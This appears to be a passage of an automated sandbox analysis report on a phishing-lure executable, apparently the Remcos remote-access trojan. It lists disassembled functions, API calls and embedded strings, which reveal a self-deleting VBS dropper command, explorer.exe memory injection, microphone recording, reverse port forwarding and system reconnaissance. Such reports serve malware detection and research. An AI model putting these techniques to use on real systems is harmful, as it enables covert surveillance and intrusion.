                            • Sleep.KERNEL32(00001388), ref: 00409E62
                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                            • API String ID: 3795512280-3163867910
                            • Opcode ID: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                            • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                            • Opcode Fuzzy Hash: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                            • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                            Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 004500C1
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                            • _free.LIBCMT ref: 004500B6
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 004500D8
                            • _free.LIBCMT ref: 004500ED
                            • _free.LIBCMT ref: 004500F8
                            • _free.LIBCMT ref: 0045011A
                            • _free.LIBCMT ref: 0045012D
                            • _free.LIBCMT ref: 0045013B
                            • _free.LIBCMT ref: 00450146
                            • _free.LIBCMT ref: 0045017E
                            • _free.LIBCMT ref: 00450185
                            • _free.LIBCMT ref: 004501A2
                            • _free.LIBCMT ref: 004501BA
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                            • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                            • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                            Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0041913D
                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                            • Sleep.KERNEL32(000003E8), ref: 0041927D
                            • GetLocalTime.KERNEL32(?), ref: 0041928C
                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                            • API String ID: 489098229-65789007
                            • Opcode ID: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                            • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                            • Opcode Fuzzy Hash: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                            • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                            Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                            • ExitProcess.KERNEL32 ref: 0040C832
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                            • API String ID: 1913171305-390638927
                            • Opcode ID: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                            • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                            • Opcode Fuzzy Hash: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                            • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                            Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                            • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                            • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                            • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                            Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                            • GetLastError.KERNEL32 ref: 00454AA6
                            • __dosmaperr.LIBCMT ref: 00454AAD
                            • GetFileType.KERNEL32(00000000), ref: 00454AB9
                            • GetLastError.KERNEL32 ref: 00454AC3
                            • __dosmaperr.LIBCMT ref: 00454ACC
                            • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                            • CloseHandle.KERNEL32(?), ref: 00454C36
                            • GetLastError.KERNEL32 ref: 00454C68
                            • __dosmaperr.LIBCMT ref: 00454C6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                            • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                            • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                            • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                            Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 65535$udp
                            • API String ID: 0-1267037602
                            • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                            • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                            • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                            • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                            Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                            • __dosmaperr.LIBCMT ref: 004393DD
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                            • __dosmaperr.LIBCMT ref: 0043941A
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                            • __dosmaperr.LIBCMT ref: 0043946E
                            • _free.LIBCMT ref: 0043947A
                            • _free.LIBCMT ref: 00439481
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                            • String ID:
                            • API String ID: 2441525078-0
                            • Opcode ID: 5089d0dae70482e3ce3a0db606f11b6a9dc19fb16784c614fbb9b0b6b0d96735
                            • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                            • Opcode Fuzzy Hash: 5089d0dae70482e3ce3a0db606f11b6a9dc19fb16784c614fbb9b0b6b0d96735
                            • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                            Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                            • TranslateMessage.USER32(?), ref: 00404F30
                            • DispatchMessageA.USER32(?), ref: 00404F3B
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                            • String ID: CloseChat$DisplayMessage$GetMessage
                            • API String ID: 2956720200-749203953
                            • Opcode ID: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
                            • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                            • Opcode Fuzzy Hash: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
                            • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                            Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                            • String ID: <$@$@FG$@FG$Temp
                            • API String ID: 1107811701-2245803885
                            • Opcode ID: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                            • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                            • Opcode Fuzzy Hash: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                            • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                            Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                            • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\RFQ-20241230.pif.exe), ref: 00406705
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess
                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                            • API String ID: 2050909247-4145329354
                            • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                            • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                            • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                            • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                            Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                            • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                            • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                            • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                            Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00446DEF
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 00446DFB
                            • _free.LIBCMT ref: 00446E06
                            • _free.LIBCMT ref: 00446E11
                            • _free.LIBCMT ref: 00446E1C
                            • _free.LIBCMT ref: 00446E27
                            • _free.LIBCMT ref: 00446E32
                            • _free.LIBCMT ref: 00446E3D
                            • _free.LIBCMT ref: 00446E48
                            • _free.LIBCMT ref: 00446E56
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                            • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                            • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                            Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Eventinet_ntoa
                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                            • API String ID: 3578746661-4192532303
                            • Opcode ID: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
                            • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                            • Opcode Fuzzy Hash: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
                            • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                            Function 00455149 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DecodePointer
                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                            • API String ID: 3527080286-3064271455
                            • Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                            • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                            • Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                            • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                            Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • Sleep.KERNEL32(00000064), ref: 00416688
                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateDeleteExecuteShellSleep
                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                            • API String ID: 1462127192-2001430897
                            • Opcode ID: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                            • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                            • Opcode Fuzzy Hash: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                            • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                            Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • _strftime.LIBCMT ref: 00401AD3
                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                            • API String ID: 3809562944-3643129801
                            • Opcode ID: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
                            • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                            • Opcode Fuzzy Hash: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
                            • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                            Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                            • waveInStart.WINMM ref: 00401A81
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                            • String ID: XCG$`=G$x=G
                            • API String ID: 1356121797-903574159
                            • Opcode ID: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
                            • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                            • Opcode Fuzzy Hash: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
                            • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                            Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                              • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                              • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                              • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                            • TranslateMessage.USER32(?), ref: 0041CA0B
                            • DispatchMessageA.USER32(?), ref: 0041CA15
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
